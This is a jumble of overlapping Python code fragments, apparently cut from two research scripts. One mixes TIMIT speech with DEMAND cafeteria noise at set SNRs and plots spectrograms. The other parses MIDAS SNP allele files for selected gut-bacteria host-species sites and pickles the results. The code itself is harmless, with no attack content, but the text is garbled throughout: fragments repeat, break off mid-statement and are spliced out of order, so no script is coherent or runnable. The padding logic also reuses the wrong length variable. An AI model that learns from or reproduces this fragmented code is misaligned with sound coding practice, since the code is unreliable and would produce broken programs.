= log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect)", "= read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning',", "np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2 =", "scipy.io import wavfile from feature_extractor import * from matplotlib import pyplot as plt", "noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) 
plt.imshow(spect) noisy_speech", "'cut': ll = min(l1, l2) x1 = x1[:ll] x2 = x2[:ll] elif handle_method", "plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320,", "plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data,", "-10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212) plt.imshow(spect) plt.show() #sd.play(noisy_speech.astype(np.int32),", "True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320,", "ll = max(l1, l2) if l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if", "ll: x1 = np.append(x1, x1[:ll-l1]) if l2 < ll: x2 = np.append(x2, x2[:ll-l1])", "== 'cut': ll = min(l1, l2) x1 = x1[:ll] x2 = x2[:ll] elif", "= np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2 = x2 / norm(x2) *", "** (0.05 * snr)) mix = x1 + x2 return mix if __name__", "def SNR(x1, x2): from numpy.linalg import norm return 20 * np.log10(norm(x1) / norm(x2))", "!= l2: if handle_method == 'cut': ll = min(l1, l2) x1 = x1[:ll]", "plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning',", "norm(x2) * norm(x1) / (10.0 ** (0.05 * snr)) mix = x1 +", "noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect)", "l2) if l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if l2 < ll:", "import norm return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method):", "= utf-8 import numpy as np from read_sphere_wav import read_sphere_wav from scipy.io import", "l2) x1 = x1[:ll] 
x2 = x2[:ll] elif handle_method == 'append': ll =", "True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320,", "log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut')", "from read_sphere_wav import read_sphere_wav from scipy.io import wavfile from feature_extractor import * from", "snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 =", "x1 + x2 return mix if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\")", "wavfile from feature_extractor import * from matplotlib import pyplot as plt def SNR(x1,", "* from matplotlib import pyplot as plt def SNR(x1, x2): from numpy.linalg import", "320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect", "mix = x1 + x2 return mix if __name__ == '__main__': speech_data, wav_header", "'append': ll = max(l1, l2) if l1 < ll: x1 = np.append(x1, x1[:ll-l1])", "mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect)", "read_sphere_wav import read_sphere_wav from scipy.io import wavfile from feature_extractor import * from matplotlib", "__name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect", "True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320,", "mix_by_db(speech_data, noise_data, 0, 'cut') spect = 
log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect)", "x2[:ll] elif handle_method == 'append': ll = max(l1, l2) if l1 < ll:", "wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech =", "spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data,", "import numpy as np from read_sphere_wav import read_sphere_wav from scipy.io import wavfile from", "SNR(x1, x2): from numpy.linalg import norm return 20 * np.log10(norm(x1) / norm(x2)) def", "x2[:ll-l1]) from numpy.linalg import norm x2 = x2 / norm(x2) * norm(x1) /", "(10.0 ** (0.05 * snr)) mix = x1 + x2 return mix if", "== 'append': ll = max(l1, l2) if l1 < ll: x1 = np.append(x1,", "'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212) plt.imshow(spect) plt.show() #sd.play(noisy_speech.astype(np.int32), fs,", "if l1 != l2: if handle_method == 'cut': ll = min(l1, l2) x1", "x2): from numpy.linalg import norm return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1,", "snr)) mix = x1 + x2 return mix if __name__ == '__main__': speech_data,", "read_sphere_wav from scipy.io import wavfile from feature_extractor import * from matplotlib import pyplot", "import * from matplotlib import pyplot as plt def SNR(x1, x2): from numpy.linalg", "plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160,", "x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if l1 != l2: if handle_method", "numpy.linalg import norm return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr,", "0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) 
plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech", "160, 'hanning', True) plt.subplot(311) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 5, 'cut') spect =", "mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212) plt.imshow(spect)", "= log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data,", "x2 return mix if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data", "'__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data,", "True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect = log_power_spectrum_extractor(noisy_speech,", "x2 = x2[:ll] elif handle_method == 'append': ll = max(l1, l2) if l1", "np from read_sphere_wav import read_sphere_wav from scipy.io import wavfile from feature_extractor import *", "x1 = x1[:ll] x2 = x2[:ll] elif handle_method == 'append': ll = max(l1,", "= log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10,", "l2: if handle_method == 'cut': ll = min(l1, l2) x1 = x1[:ll] x2", "= mix_by_db(speech_data, noise_data, 5, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312)", "'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data,", "x1[:ll-l1]) if l2 < ll: x2 = 
np.append(x2, x2[:ll-l1]) from numpy.linalg import norm", "max(l1, l2) if l1 < ll: x1 = np.append(x1, x1[:ll-l1]) if l2 <", "return mix if __name__ == '__main__': speech_data, wav_header = read_sphere_wav(u\"/media/neo/000C6F0F00042510/Doctor/dataset/TIMIT/train/dr1/fcjf0/sa1.wav\") fs, noise_data =", "fs, noise_data = wavfile.read('/media/neo/000C6F0F00042510/Doctor/dataset/DEMAND/PCAFETER/ch01.wav') plt.figure() spect = log_power_spectrum_extractor(speech_data, 320, 160, 'hanning', True) plt.subplot(311)", "'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech = mix_by_db(speech_data, noise_data, -5, 'cut') spect =", "= x1[:ll] x2 = x2[:ll] elif handle_method == 'append': ll = max(l1, l2)", "320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect", "= mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(212)", "handle_method == 'append': ll = max(l1, l2) if l1 < ll: x1 =", "norm(x1) / (10.0 ** (0.05 * snr)) mix = x1 + x2 return", "= x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if l1", "= log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(312) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0,", "from matplotlib import pyplot as plt def SNR(x1, x2): from numpy.linalg import norm", "= x2.shape[0] if l1 != l2: if handle_method == 'cut': ll = min(l1,", "x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0] if l1 != l2:", "plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, 0, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning',", "= min(l1, l2) x1 = x1[:ll] x2 = x2[:ll] elif handle_method == 'append':", "20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32)", "* snr)) mix = x1 + x2 return mix if __name__ == 
'__main__':", "from numpy.linalg import norm return 20 * np.log10(norm(x1) / norm(x2)) def mix_by_db(x1, x2,", "'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(313) plt.imshow(spect) plt.figure() noisy_speech =", "as np from read_sphere_wav import read_sphere_wav from scipy.io import wavfile from feature_extractor import", "handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0] l2 = x2.shape[0]", "< ll: x1 = np.append(x1, x1[:ll-l1]) if l2 < ll: x2 = np.append(x2,", "mix_by_db(x1, x2, snr, handle_method): x1 = x1.astype(np.int32) x2 = x2.astype(np.int32) l1 = x1.shape[0]", "x2 / norm(x2) * norm(x1) / (10.0 ** (0.05 * snr)) mix =", "noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut') spect = log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True)", "import read_sphere_wav from scipy.io import wavfile from feature_extractor import * from matplotlib import", "(0.05 * snr)) mix = x1 + x2 return mix if __name__ ==", "l2 = x2.shape[0] if l1 != l2: if handle_method == 'cut': ll =", "= x2[:ll] elif handle_method == 'append': ll = max(l1, l2) if l1 <", "log_power_spectrum_extractor(noisy_speech, 320, 160, 'hanning', True) plt.subplot(211) plt.imshow(spect) noisy_speech = mix_by_db(speech_data, noise_data, -10, 'cut')", "if l2 < ll: x2 = np.append(x2, x2[:ll-l1]) from numpy.linalg import norm x2", "l1 = x1.shape[0] l2 = x2.shape[0] if l1 != l2: if handle_method ==", "matplotlib import pyplot as plt def SNR(x1, x2): from numpy.linalg import norm return" ]
[ "at given sites from utils import sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils,", "Set up pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir", "= float(info_items[5]) # Only look at sites of interest if (contig, location, gene_name)", "('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916),", "'R' # note R was assigned indiscriminately pvalue = float(info_items[5]) # Only look", "(alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map", "# Get all samples within the host desired_samples = [] for subject in", "but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499',", "samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if sample in", "pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir) # Store these", "species, sites in desired_host_species_sites: # Get all samples within the host desired_samples =", "MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of desired", "= \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir) # Store these two", "# Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle", "'59-M'], 'Bifidobacterium_adolescentis_56815', 
[('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] #", "for specific samples at specific sites # where sites are provided as (contig,", "for line in snp_alleles_file: items = line.split() # Load information about site info_items", "parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from numpy.random", "within the host desired_samples = [] for subject in subjects: desired_samples += subject_sample_map[subject].keys()", "\\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\", "Map: site (contig, location, gene_id) -> variant type variant_type_map = {} num_sites_processed =", "\\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] #", "35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L),", "bz2 import numpy import os, sys # Desired samples and sites # sites", "sites in annotated_snps.txt file for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k", "===================================================================== # sample -> site -> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict)", "= [] for gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id)) # Obtain", "info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] 
polarization = 'R'", "in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split()", "% (config.data_directory, species_name) # Load population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort,", "= samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map", "of interest if (contig, location, gene_name) not in desired_sites: continue # Store variant", "of given QP pairs at given sites from utils import sample_utils as su,", "from collections import defaultdict import pickle import bz2 import numpy import os, sys", "np_random, randint import random from collections import defaultdict import pickle import bz2 import", "# Store variant type variant_type_map[(contig, location, gene_name)] = variant_type # Store alt and", "location, gene_id) tuples # TODO: move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name,", "bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of desired sample idxs items =", "[] for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs))", "desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig,", "TODO: move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): #", "numpy as np from numpy.random import choice, random as np_random, randint import random", "QP pairs at given sites from utils import 
sample_utils as su, parse_midas_data, substitution_rates_utils,", "desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split() # Load information", "snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items))", "location) not in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele = items[1+idx] sample", "site -> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file", "\\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\", "desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene = [(contig, location)", "alt, depth = [float(num) for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location,", "in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele)", "# Process allele information # ===================================================================== # sample -> site -> (ref allele,", "# Loads allele counts for specific samples at specific sites # where sites", "\\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'],", "1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L),", "= items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if (contig,", "parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) 
# Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' % (pdir,", "import os, sys # Desired samples and sites # sites are given as", "= [] for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs =", "and counts) # for small set of given QP pairs at given sites", "location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites)", "('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])]", "os.system('mkdir -p %s' % pdir) # Store these two dicts for each host-species", "snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample", "small set of given QP pairs at given sites from utils import sample_utils", "contig = info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if (contig, location) not", "= (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things", "\\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\", "for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k 
sites processed...\\n\" % (num_sites_processed/10000))", "defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:]", "allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" %", "= bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of desired sample idxs items", "% (num_sites_processed/10000)) num_sites_processed += 1 items = line.split() # Load information about site", "# Process annotated_snps information # ===================================================================== # Open post-processed MIDAS output snp_file =", "location, gene_id in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name)", "'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I',", "num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items = line.split() #", "Load information about site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1])", "items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples:", "# Load population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) #", "sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line", "in snp_alleles_file: items = line.split() # Load information about site info_items = items[0].split(\"|\")", "(ddir) os.system('mkdir -p %s' % 
pdir) # Store these two dicts for each", "numpy.random import choice, random as np_random, randint import random from collections import defaultdict", "Loads allele counts for specific samples at specific sites # where sites are", "Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts", "for all desired samples for idx in desired_sample_idxs: alt, depth = [float(num) for", "('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32',", "subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory ddir = config.data_directory pdir =", "\\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\", "was assigned indiscriminately pvalue = float(info_items[5]) # Only look at sites of interest", "samples at specific sites # where sites are provided as (contig, location, gene_id)", "# Map: sample -> site (contig, location, gene_id) -> allele count allele_counts_map =", "sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map:", "type variant_type_map[(contig, location, gene_name)] = variant_type # Store alt and depth counts at", "[] for subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites =", "[('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # 
=========================================================================== #", "post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # Process", "('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283',", "sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items = line.split() # Load", "samples and sites # sites are given as gene_id, contig, location tuples #", "\\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\", "'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945),", "location, gene_id) -> variant type variant_type_map = {} num_sites_processed = 0 # Loop", "# Loop over sites in annotated_snps.txt file for line in snp_file: if num_sites_processed>0", "('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads", "import choice, random as np_random, randint import random from collections import defaultdict import", "124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L),", "species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r')", "return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things 
subject_sample_map = su.parse_subject_sample_map() #", "info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type", "{} num_sites_processed = 0 # Loop over sites in annotated_snps.txt file for line", "items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== #", "for each host-species pair for subjects, species, sites in desired_host_species_sites: # Get all", "location, gene_name)] = variant_type # Store alt and depth counts at this site", "in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx]", "in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return", "= {} num_sites_processed = 0 # Loop over sites in annotated_snps.txt file for", "allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load", "(contig, location) not in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele = items[1+idx]", "items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3]", "prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene = [(contig, location) for contig,", "# Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples", "desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample ->", "location, gene_id) -> allele count allele_counts_map = defaultdict(dict) # Map: site (contig, 
location,", "pairs at given sites from utils import sample_utils as su, parse_midas_data, substitution_rates_utils, config,", "sites in desired_host_species_sites: # Get all samples within the host desired_samples = []", "not in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele = items[1+idx] sample =", "# Alternate version without gene names desired_sites_no_gene = [(contig, location) for contig, location,", "not in desired_sites: continue # Store variant type variant_type_map[(contig, location, gene_name)] = variant_type", "os, sys # Desired samples and sites # sites are given as gene_id,", "'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130',", "snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir,", "gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map,", "('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ 